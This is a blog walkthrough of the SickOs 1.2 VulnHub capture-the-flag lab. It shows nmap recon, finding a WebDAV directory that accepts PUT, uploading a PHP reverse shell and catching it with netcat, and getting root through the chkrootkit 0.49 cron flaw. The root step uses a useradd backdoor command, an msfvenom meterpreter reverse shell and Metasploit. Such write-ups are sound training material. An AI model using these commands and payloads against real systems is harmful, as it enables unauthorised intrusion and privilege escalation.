In this walk through I explain how to solve the SickOs 1.2 challenge. The instructions say to get the highest privileges possible e.g. get root. The download instructions say that you need to use VMware to run this vm. I say fooey to that.  Since I’m already a fond user of VirtualBox I fully intended to run it for this challenge.  To do so download the image zip file, extract the .vmdk.  To run in VirtualBox you just create an new VM, set the OS type Linux, Version Ubuntu 64bit, and select Do not add a virtual hard disk.

VB-SickOS

Open the new SickOS vm settings and go to Storage settings.

Click the icon to add a new hard disk to the existing controller.

Select Choose existing disk then select the SickOs1.2-disk1.vmdk

Now the VM is ready to boot.

The Challenge

In order to find the IP address of the target I use netdiscover:

netdiscover -r 10.0.2.0/24

Now that the IP address is identified it’s time to profile the target.

root@Oak:~/Downloads/sickos# nmap -A -p- 10.0.2.29 
 
Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-30 11:09 EDT 
Nmap scan report for 10.0.2.29 
Host is up (0.00051s latency). 
Not shown: 65533 filtered ports 
PORT STATE SERVICE VERSION 
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0) 
| ssh-hostkey: 
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA) 
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA) 
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA) 
80/tcp open http lighttpd 1.4.28 
|_http-server-header: lighttpd/1.4.28 
|_http-title: Site doesn't have a title (text/html). 
MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC) 
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 
Device type: general purpose 
Running: Linux 3.X|4.X 
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 
OS details: Linux 3.10 - 4.1, Linux 3.16 - 3.19, Linux 3.2 - 4.4 
Network Distance: 1 hop 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 
 
TRACEROUTE 
HOP RTT ADDRESS 
1 0.51 ms 10.0.2.29 
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 114.27 seconds

Ok, port 22 and 80 is open. I start by examining port 80 and I’m met with a keanu conspiracy meme image.

blow

I wasted a lot of time looking at this image for hidden treasures. I used tools such as foremost to see if any other files were combined with the image, I used exiftool to no avail. I then tried steghide to extract hidden messages. I even used Gimp and tried to adjust the color histogram to see if a message was hidden in the negative color.

Nothing… hmm, at this point I moved on from the image. I looked back at the source code of the webpage and noticed there was a message at the bottom.

<!-- NOTHING IN HERE ///\\\ -->>>>

I though the extra > symbols had some meaning but I came up with no explanation.

I decided to continue to probe the http service to see if I can find a way in.

I ran the http-enum nmap script and found a hidden directory.

root@Oak:~# nmap -p80 -sV --script http-enum --script-args http-enum.displayall 10.0.2.29

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 17:09 EDT
Nmap scan report for 10.0.2.29
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.28
| http-enum: 
|_ /test/: Test page
|_http-server-header: lighttpd/1.4.28
MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.24 seconds

The /test directory was empty, so no help there.

I wanted to see what methods are enabled on the http service so I ran the nmap http-methods script.

root@Oak:~# nmap --script http-methods --script-args http.test-all 10.0.2.29
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 17:45 EDT
Nmap scan report for 10.0.2.29
Host is up (0.00021s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.00 seconds

Hmm, next I decide to query the options method to see if anything else sticks out as interesting.

Nothing looked interesting at the webroot so then I check the hidden test directory in hopes that maybe its a webdav directory.

root@Oak:~# curl -i -X OPTIONS 10.0.2.29/test
HTTP/1.1 301 Moved Permanently
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Location: http://10.0.2.29/test/
Content-Length: 0
Date: Sun, 01 May 2016 21:26:27 GMT
Server: lighttpd/1.4.28

The PUT option looks interesting.

I used the nmap http-put script and was able to upload a PHP reverse shell from Pentestmonkey.

root@Oak:~# nmap -p80 10.0.2.29 --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php'

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 17:32 EDT
Nmap scan report for 10.0.2.29
Host is up (0.00023s latency).
PORT STATE SERVICE
80/tcp open http
|_http-put: /test/sicpwn.php was successfully created
MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds

Now to fire up a netcat listenter to catch the connection.

nc -nlvp 443

I triggered the php reverse shell using curl

curl http://10.0.2.29/test/sicpwn.php
root@Oak:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.27] from (UNKNOWN) [10.0.2.29] 53091
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 14:56:24 up 36 min, 0 users, load average: 0.02, 0.07, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Now at this point I have a low privilege shell.  Now it’s time to escalate.

After a bit of looking around I noticed a cron job that runs daily to run chkrootkit.  This stood out as something to look into.

ls -la /etc/cron* 
... 
/etc/cron.daily: 
... 
-rwxr-xr-x  1 root root  2032 Jun  4  2014 chkrootkit

I did a google search for chkrootkit exploit and found the EDB entry for a chkrootkit 0.49 – Local Root Vulnerability.

I needed to know if the version running on the target is vulnerable.

$ head /usr/sbin/chkrootkit
#! /bin/sh
# -*- Shell-script -*-

# $Id: chkrootkit, v 0.49 2009/07/30
CHKROOTKIT_VERSION='0.49'

# Authors: Nelson Murilo <nelson@pangeia.com.br> (main author) and
# Klaus Steding-Jessen <jessen@cert.br>
#
# (c)1997-2009 Nelson Murilo, Pangeia Informatica, AMS Foundation and others.

Cool, it looks like this might be the way to get root. The only problem is that the cron job only runs once a day at 6:25.

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$

I created a file called update in /tmp and included a script to add a root user called kaizen.

echo useradd -ou 0 -g 0 kaizen > /tmp/update

The only problem was when 6:25 rolled around nothing happened. At this point I was annoyed.

Next I tried every Ubuntu exploit listed on EDB but none of them worked. I thought surely there had to be a better way than waiting until the next day to try the chkrootkit exploit.

Since nothing else I tried worked and since I didn’t want to wait any more. I decided to fire up my old friend Metasploit.

Metasploit has an exploit for the chkrootkit vulnerability but it requires a session so I created a meterpreter reverse shell with mvfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.27 LPORT=443 -f elf -o sh_rev_443

I used the nmap http-put script to upload the reverse shell

Then setup a metasploit handler to listen.

use exploit/multi/handler
msf exploit(handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
 ---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
 ---- --------------- -------- -----------
 DebugOptions 0 no Debugging options for POSIX meterpreter
 LHOST 10.0.2.27 yes The listen address
 LPORT 443 yes The listen port
msf exploit(handler) > run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.0.2.27:443 
msf exploit(handler) > [*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 10.0.2.29
[*] Meterpreter session 2 opened (10.0.2.27:443 -> 10.0.2.29:55936) at 2016-05-01 12:50:24 -0400

Now I needed to setup the chkrootkit exploit and payload.

msf exploit(handler) > use exploit/unix/local/chkrootkit
msf exploit(chkrootkit) > options

Module options (exploit/unix/local/chkrootkit):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
 SESSION yes The session to run this module on.


Exploit target:

Id Name
 -- ----
 0 Automatic

msf exploit(chkrootkit) > set lport 443
lport => 443
msf exploit(chkrootkit) > run -j
[*] Exploit running as background job.

[*] Started reverse TCP double handler on 10.0.2.27:443 
msf exploit(chkrootkit) > [!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo TFiotsawCMKjHBKc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "TFiotsawCMKjHBKc\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 3 opened (10.0.2.27:443 -> 10.0.2.29:55938) at 2016-05-01 12:52:35 -0400
[+] Deleted /tmp/update

I thought I was going to be waiting for a while, but the exploit was triggered immediately.

msf exploit(chkrootkit) > sessions -i 3
[*] Starting interaction with 3...

1606353480
oAlQqrGWXPVvhovERhaAQpsLuefqCBaT
true
bniDukHTDahxHIpUOlhgYSUxodJwqfwV
GJIQAOHHmgrfXvfvadGjTMXPKbgplxyL
PtpPWWwukudKtkYtVpeGFVNptgHBtXwF
id
uid=0(root) gid=0(root) groups=0(root)
ls /root
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
chkrootkit-0.49
newRule

Excellent! I have root!!

And now for the flag:

cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

Summary:

Thanks to @D4rk36 and @Vulnhub for the challenge. It was a fun way to spend a rainy weekend.

Advertisements